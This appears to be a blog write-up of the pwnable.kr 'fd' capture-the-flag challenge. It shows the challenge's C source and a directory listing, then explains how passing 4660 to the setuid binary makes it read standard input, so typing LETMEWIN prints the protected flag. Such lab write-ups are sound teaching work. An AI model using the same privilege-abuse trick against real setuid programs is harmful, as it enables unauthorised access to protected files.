![Cover image for [pwnable.kr] fd writeup](https://media2.dev.to/dynamic/image/width=1000,height=420,fit=cover,gravity=auto,format=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu62wgdvuzycbqwm7oa31.png)
ls -al
total 40
drwxr-x--- 5 root fd 4096 Oct 26 2016 .
drwxr-xr-x 116 root root 4096 Nov 11 2021 ..
d--------- 2 root root 4096 Jun 12 2014 .bash_history
-r-sr-x--- 1 fd_pwn fd 7322 Jun 11 2014 fd
-rw-r--r-- 1 root root 418 Jun 11 2014 fd.c
-r--r----- 1 fd_pwn root 50 Jun 11 2014 flag
-rw------- 1 root root 128 Oct 26 2016 .gdb_history
dr-xr-xr-x 2 root root 4096 Dec 19 2016 .irssi
drwxr-xr-x 2 root root 4096 Oct 23 2016 .pwntools-cache
The file we want to read is a flag file, and only the fd_pwn owner or the root user can read the file.
BUT we are fd now.
So we should be the fd_pwn to gain proper permission.
fd has SetUID to fd_pwn. We can use it to gain access.
Look the source file up:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
int fd = atoi( argv[1] ) - 0x1234;
int len = 0;
len = read(fd, buf, 32);
if(!strcmp("LETMEWIN\n", buf)){
printf("good job :)\n");
system("/bin/cat flag");
exit(0);
}
printf("learn about Linux file IO\n");
return 0;
}
We have to put an argument value, and if we put 0x1234 in the argument value, fd = 0 so that we can use standard input (keyboard) to input. After that we can set buf to LETMEWIN via standard input.
0x1234 is 4660 in decimal, so run following command to get the desired result:
./fd 4660
LETMEWIN
good job :)
_FLAG_
Top comments (0)